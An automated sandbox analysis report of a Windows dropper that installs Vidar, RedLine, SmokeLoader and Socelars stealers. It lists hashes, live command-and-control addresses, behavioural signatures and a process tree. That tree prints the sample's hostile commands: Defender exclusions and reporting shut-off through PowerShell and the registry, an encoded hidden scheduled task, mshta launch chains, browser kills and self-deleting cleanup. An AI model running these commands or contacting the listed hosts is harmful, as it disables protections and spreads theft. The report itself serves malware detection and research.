Analysis

  • max time kernel
    7s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    21-09-2021 22:36

General

  • Target

    295b842a1a8473e51468fed24d1527cd.exe

  • Size

    5.0MB

  • MD5

    295b842a1a8473e51468fed24d1527cd

  • SHA1

    e781082d1998162c11c2858a7a4b14db110c201f

  • SHA256

    093c40a96a55be0cc76dd3f234eebc8e66f453626f0d217fce4bb91d5e5afa5c

  • SHA512

    7a59d800c62599f54268df99cd014b0323b15df2120f974834d2673cec63a2c140ea9da989a1e01c0a19876accb4d97deb6e77d0126441e5b4259c8493c4f448

Malware Config

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

janesam

C2

65.108.20.195:6774

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 8 IoCs
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\295b842a1a8473e51468fed24d1527cd.exe
    "C:\Users\Admin\AppData\Local\Temp\295b842a1a8473e51468fed24d1527cd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2512
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2240
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2212
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon11cce54fe7cc83fa3.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon11cce54fe7cc83fa3.exe
          Mon11cce54fe7cc83fa3.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:428
          • C:\Users\Admin\AppData\Roaming\1369137.scr
            "C:\Users\Admin\AppData\Roaming\1369137.scr" /S
            5⤵
              PID:5036
              • C:\Users\Admin\AppData\Roaming\1369137.scr
                "C:\Users\Admin\AppData\Roaming\1369137.scr"
                6⤵
                  PID:5548
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 896
                  6⤵
                  • Program crash
                  PID:5940
              • C:\Users\Admin\AppData\Roaming\7982180.scr
                "C:\Users\Admin\AppData\Roaming\7982180.scr" /S
                5⤵
                  PID:5488
                • C:\Users\Admin\AppData\Roaming\2790836.scr
                  "C:\Users\Admin\AppData\Roaming\2790836.scr" /S
                  5⤵
                    PID:4880
                  • C:\Users\Admin\AppData\Roaming\1823216.scr
                    "C:\Users\Admin\AppData\Roaming\1823216.scr" /S
                    5⤵
                      PID:5624
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Mon11bddd2ee4744bdc.exe
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:508
                  • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon11bddd2ee4744bdc.exe
                    Mon11bddd2ee4744bdc.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3920
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      5⤵
                        PID:8000
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          6⤵
                          • Kills process with taskkill
                          PID:6160
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon11c20bd59014d.exe /mixone
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3484
                    • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon11c20bd59014d.exe
                      Mon11c20bd59014d.exe /mixone
                      4⤵
                      • Executes dropped EXE
                      PID:1696
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 660
                        5⤵
                        • Program crash
                        PID:3188
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 676
                        5⤵
                        • Program crash
                        PID:6060
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 500
                        5⤵
                        • Program crash
                        PID:4280
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 836
                        5⤵
                        • Program crash
                        PID:2992
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 892
                        5⤵
                        • Program crash
                        PID:6172
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 932
                        5⤵
                        • Program crash
                        PID:4744
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 1056
                        5⤵
                        • Program crash
                        PID:4576
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon11a554223654cac.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:824
                    • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon11a554223654cac.exe
                      Mon11a554223654cac.exe
                      4⤵
                      • Executes dropped EXE
                      PID:3660
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon1103cf83aaf9.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1004
                    • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon1103cf83aaf9.exe
                      Mon1103cf83aaf9.exe
                      4⤵
                      • Executes dropped EXE
                      PID:812
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon1160373b3b6ac3f.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1160
                    • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon1160373b3b6ac3f.exe
                      Mon1160373b3b6ac3f.exe
                      4⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1784
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon117107f765b140f6f.exe
                    3⤵
                      PID:912
                      • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon117107f765b140f6f.exe
                        Mon117107f765b140f6f.exe
                        4⤵
                          PID:3936
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Mon1133139d83b18.exe
                        3⤵
                          PID:3952
                          • C:\Users\Admin\AppData\Local\Temp\7zSCE855DB2\Mon1133139d83b18.exe
                            Mon1133139d83b18.exe
                            4⤵
                            • Executes dropped EXE
                            PID:1728
                            • C:\Users\Admin\Documents\jKJUSdPzIU4Ryod967Nil_6J.exe
                              "C:\Users\Admin\Documents\jKJUSdPzIU4Ryod967Nil_6J.exe"
                              5⤵
                                PID:7500
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\jKJUSdPzIU4Ryod967Nil_6J.exe"
                                  6⤵
                                    PID:5936
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      7⤵
                                      • Delays execution with timeout.exe
                                      PID:5168
                                • C:\Users\Admin\Documents\od7wuglb7793nG2u1K6A2FCW.exe
                                  "C:\Users\Admin\Documents\od7wuglb7793nG2u1K6A2FCW.exe"
                                  5⤵
                                    PID:5240
                                  • C:\Users\Admin\Documents\ukEfEB2fheXAo1CPlx7r_hZw.exe
                                    "C:\Users\Admin\Documents\ukEfEB2fheXAo1CPlx7r_hZw.exe"
                                    5⤵
                                      PID:3428
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                        6⤵
                                        • Creates scheduled task(s)
                                        PID:8704
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                        6⤵
                                        • Creates scheduled task(s)
                                        PID:8696
                                      • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                                        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                                        6⤵
                                          PID:8688
                                      • C:\Users\Admin\Documents\t8ej1Xzm9yTGVt7YBzMfUCpu.exe
                                        "C:\Users\Admin\Documents\t8ej1Xzm9yTGVt7YBzMfUCpu.exe"
                                        5⤵
                                          PID:4476
                                        • C:\Users\Admin\Documents\BTb1F3hWQL0DT47KoAJQEswc.exe
                                          "C:\Users\Admin\Documents\BTb1F3hWQL0DT47KoAJQEswc.exe"
                                          5⤵
                                            PID:6908
                                          • C:\Users\Admin\Documents\K9Y3hj2_US7JRHG7tCNR4XI0.exe
                                            "C:\Users\Admin\Documents\K9Y3hj2_US7JRHG7tCNR4XI0.exe"
                                            5⤵
                                              PID:4056
                                            • C:\Users\Admin\Documents\XTFl8PUmchFlXlglAmqKqBLa.exe
                                              "C:\Users\Admin\Documents\XTFl8PUmchFlXlglAmqKqBLa.exe"
                                              5⤵
                                                PID:6368
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                  6⤵
                                                    PID:1528
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                      7⤵
                                                        PID:7692
                                                  • C:\Users\Admin\Documents\MTvG2CiVeBmgg94M3xEO8FWm.exe
                                                    "C:\Users\Admin\Documents\MTvG2CiVeBmgg94M3xEO8FWm.exe"
                                                    5⤵
                                                      PID:5272
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSF379.tmp\Install.exe
                                                        .\Install.exe
                                                        6⤵
                                                          PID:7544
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSF10.tmp\Install.exe
                                                            .\Install.exe /S /site_id "394347"
                                                            7⤵
                                                              PID:6420
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                8⤵
                                                                  PID:5644
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                    9⤵
                                                                      PID:8380
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                        10⤵
                                                                          PID:8716
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                            11⤵
                                                                              PID:8300
                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                12⤵
                                                                                  PID:8456
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                          8⤵
                                                                            PID:4676
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                              9⤵
                                                                                PID:8592
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                  10⤵
                                                                                    PID:8636
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                    10⤵
                                                                                      PID:8920
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                  8⤵
                                                                                    PID:6136
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                      9⤵
                                                                                        PID:8816
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                          10⤵
                                                                                            PID:9120
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                            10⤵
                                                                                              PID:5688
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "gVmUhDJFU" /SC once /ST 13:57:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                          8⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:8680
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "gVmUhDJFU"
                                                                                          8⤵
                                                                                            PID:9152
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "gVmUhDJFU"
                                                                                            8⤵
                                                                                              PID:7968
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 22:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\KKpFQUB.exe\" tt /site_id 394347 /S" /V1 /F
                                                                                              8⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:6208
                                                                                      • C:\Users\Admin\Documents\9d_s655yjolj1x94a1kLjfjz.exe
                                                                                        "C:\Users\Admin\Documents\9d_s655yjolj1x94a1kLjfjz.exe"
                                                                                        5⤵
                                                                                          PID:912
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" vBScrIPt: CLoSe (cREATEobjEcT( "WscRIpt.SHEll" ). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\9d_s655yjolj1x94a1kLjfjz.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\9d_s655yjolj1x94a1kLjfjz.exe"" ) do taskkill -im ""%~nXR"" /f" , 0 , TRUE))
                                                                                            6⤵
                                                                                              PID:4236
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\9d_s655yjolj1x94a1kLjfjz.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If "" =="" for %R IN ( "C:\Users\Admin\Documents\9d_s655yjolj1x94a1kLjfjz.exe" ) do taskkill -im "%~nXR" /f
                                                                                                7⤵
                                                                                                  PID:7128
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE
                                                                                                    Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh
                                                                                                    8⤵
                                                                                                      PID:7852
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" vBScrIPt: CLoSe (cREATEobjEcT( "WscRIpt.SHEll" ). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" , 0 , TRUE))
                                                                                                        9⤵
                                                                                                          PID:7696
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f
                                                                                                            10⤵
                                                                                                              PID:8388
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            "C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv
                                                                                                            9⤵
                                                                                                              PID:8708
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill -im "9d_s655yjolj1x94a1kLjfjz.exe" /f
                                                                                                            8⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:7560
                                                                                                    • C:\Users\Admin\Documents\Lsbq6_qAVPyz1MDwsp1oJsmV.exe
                                                                                                      "C:\Users\Admin\Documents\Lsbq6_qAVPyz1MDwsp1oJsmV.exe"
                                                                                                      5⤵
                                                                                                        PID:7296
                                                                                                        • C:\Users\Admin\Documents\Lsbq6_qAVPyz1MDwsp1oJsmV.exe
                                                                                                          "C:\Users\Admin\Documents\Lsbq6_qAVPyz1MDwsp1oJsmV.exe"
                                                                                                          6⤵
                                                                                                            PID:4584
                                                                                                          • C:\Users\Admin\Documents\Lsbq6_qAVPyz1MDwsp1oJsmV.exe
                                                                                                            "C:\Users\Admin\Documents\Lsbq6_qAVPyz1MDwsp1oJsmV.exe"
                                                                                                            6⤵
                                                                                                              PID:6312
                                                                                                          • C:\Users\Admin\Documents\XBzoDo7Uabptx1a2T_enVMjV.exe
                                                                                                            "C:\Users\Admin\Documents\XBzoDo7Uabptx1a2T_enVMjV.exe"
                                                                                                            5⤵
                                                                                                              PID:7836
                                                                                                              • C:\Users\Admin\Documents\XBzoDo7Uabptx1a2T_enVMjV.exe
                                                                                                                C:\Users\Admin\Documents\XBzoDo7Uabptx1a2T_enVMjV.exe
                                                                                                                6⤵
                                                                                                                  PID:6968
                                                                                                                • C:\Users\Admin\Documents\XBzoDo7Uabptx1a2T_enVMjV.exe
                                                                                                                  C:\Users\Admin\Documents\XBzoDo7Uabptx1a2T_enVMjV.exe
                                                                                                                  6⤵
                                                                                                                    PID:6348
                                                                                                                • C:\Users\Admin\Documents\jas5bZVZd_oO_fgmGp_Vn9s4.exe
                                                                                                                  "C:\Users\Admin\Documents\jas5bZVZd_oO_fgmGp_Vn9s4.exe"
                                                                                                                  5⤵
                                                                                                                    PID:7796
                                                                                                                  • C:\Users\Admin\Documents\70s2OCXVHN_0cIsiVHPKNrGc.exe
                                                                                                                    "C:\Users\Admin\Documents\70s2OCXVHN_0cIsiVHPKNrGc.exe"
                                                                                                                    5⤵
                                                                                                                      PID:5716
                                                                                                                      • C:\Users\Admin\Documents\70s2OCXVHN_0cIsiVHPKNrGc.exe
                                                                                                                        "C:\Users\Admin\Documents\70s2OCXVHN_0cIsiVHPKNrGc.exe"
                                                                                                                        6⤵
                                                                                                                          PID:9200
                                                                                                                      • C:\Users\Admin\Documents\HTOTE8q7HEYGs2875VC81GB_.exe
                                                                                                                        "C:\Users\Admin\Documents\HTOTE8q7HEYGs2875VC81GB_.exe"
                                                                                                                        5⤵
                                                                                                                          PID:8104
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                            6⤵
                                                                                                                              PID:5096
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                7⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:8412
                                                                                                                          • C:\Users\Admin\Documents\_12Fq5UA8EWM55apkYqg7z2x.exe
                                                                                                                            "C:\Users\Admin\Documents\_12Fq5UA8EWM55apkYqg7z2x.exe"
                                                                                                                            5⤵
                                                                                                                              PID:4604
                                                                                                                            • C:\Users\Admin\Documents\6Tb26PtBtAbTkdcsB7bQKy85.exe
                                                                                                                              "C:\Users\Admin\Documents\6Tb26PtBtAbTkdcsB7bQKy85.exe"
                                                                                                                              5⤵
                                                                                                                                PID:4952
                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:6120
                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4616
                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:424
                                                                                                                                    • C:\Users\Admin\Documents\kLVi9TjYgddqgJvTKJjHAzWx.exe
                                                                                                                                      "C:\Users\Admin\Documents\kLVi9TjYgddqgJvTKJjHAzWx.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:7248
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                          6⤵
                                                                                                                                            PID:5268
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\210921.exe
                                                                                                                                              "210921.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:7344
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Done.exe
                                                                                                                                                "Done.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:1272
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:6544
                                                                                                                                              • C:\Users\Admin\Documents\69YOzpkOSwUqeZNTOcShtFGd.exe
                                                                                                                                                "C:\Users\Admin\Documents\69YOzpkOSwUqeZNTOcShtFGd.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:5148
                                                                                                                                                • C:\Users\Admin\Documents\bjshgiltMkfzgXQfGaaRGURl.exe
                                                                                                                                                  "C:\Users\Admin\Documents\bjshgiltMkfzgXQfGaaRGURl.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4948
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im bjshgiltMkfzgXQfGaaRGURl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\bjshgiltMkfzgXQfGaaRGURl.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6624
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im bjshgiltMkfzgXQfGaaRGURl.exe /f
                                                                                                                                                          7⤵
                                                                                                                                                          • Kills process with taskkill
